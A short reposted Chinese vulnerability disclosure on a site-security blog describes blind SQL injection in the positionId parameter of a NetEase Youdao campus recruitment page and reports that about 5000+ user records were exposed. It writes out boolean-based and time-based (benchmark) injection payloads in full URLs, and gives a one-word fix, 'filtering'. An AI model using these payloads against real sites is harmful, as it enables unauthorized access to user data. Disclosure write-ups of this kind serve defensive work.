网易有道某分站盲注及修复 - 网站安全 - 自学p

网易有道某分站盲注，导致用户信息泄漏

有漏洞的参数是positionId，用and语句判断存在SQL注入。

http://campus.youdao测试数据/campus/job_list.php?t1=campus&positionId=1 and 1=1 返回正确

http://campus.youdao测试数据/campus/job_list.php?t1=campus&positionId=1 and 1=2 返回错误

然后用benchmark函数判断存在盲注，明显有延时。

http://campus.youdao测试数据/campus/job_list.php?t1=campus&positionId=1 and if(1,benchmark(500000,md5(1)),1)

大概5000+用户信息。

修复方案：过滤

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did13344

更新时间：2022-09-13 阅读：44次